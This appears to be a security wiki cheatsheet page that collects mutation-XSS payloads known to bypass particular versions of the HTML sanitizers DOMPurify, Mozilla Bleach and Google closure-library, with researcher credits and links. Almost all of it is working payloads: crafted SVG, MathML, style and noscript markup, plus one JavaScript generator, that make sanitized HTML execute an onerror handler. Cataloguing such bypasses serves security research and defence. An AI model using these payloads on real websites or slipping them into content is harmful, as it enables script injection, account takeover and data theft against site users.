search

XSS

hashtag
mXSS

LogomXSS cheatsheetsonarsource.github.iochevron-right
Source of table

hashtag
/ Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.

hashtag
DomPurify

Version
Payload
Credit
Additional links

2.0.0

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

Michał Bentkowski @SecurityMBarrow-up-right

https://research.securitum.com/dompurify-bypass-using-mxss/arrow-up-right

2.0.17

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Michał Bentkowski @SecurityMBarrow-up-right

https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/arrow-up-right

2.0.17

<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

Gareth Heyes @garethheyesarrow-up-right

https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xssarrow-up-right

2.0.17

<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>

@sqrtrevarrow-up-right @0xParrotarrow-up-right @web_payload team @GuesserSuperarrow-up-right

https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfwarrow-up-right

2.2.0

<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

Daniel Santos @bananabrarrow-up-right

https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878farrow-up-right

2.2.3

<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">

Michał Bentkowski @SecurityMBarrow-up-right

https://twitter.com/SecurityMB/status/1341290687963262978arrow-up-right

3.0.8

<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">

Kévin - Mizu @kevin_mizuarrow-up-right

https://mizu.re/post/playing-with-dompurify-ce-handlingarrow-up-right

3.1.0

n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;

icesfontarrow-up-right

N/A

3.1.7

<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.

Masato Kinugawa @kinugawamasatoarrow-up-right

https://x.com/kinugawamasato/status/1843687909431582830arrow-up-right

hashtag
Mozilla Bleach

Version
Payload
Credit
Additional links

3.1.0

<noscript><style></noscript><img src=x onerror=alert(1)>

Yaniv Nizry @YNizryarrow-up-right

https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/arrow-up-right

3.1.1

<svg><style><img src=x onerror=alert(1)>

Yaniv Nizry @YNizryarrow-up-right

https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/arrow-up-right

3.2.3

<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>

Yaniv Nizry @YNizryarrow-up-right

https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpqarrow-up-right

hashtag
Google closure-library

Version
Payload
Credit
Additional links

v20190215

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Masato Kinugawa @kinugawamasatoarrow-up-right

https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffaarrow-up-right https://www.youtube.com/watch?v=lG7U3fuNw3Aarrow-up-right

PreviousCustom compiled filesNextAzure AD (Entra ID)

Last updated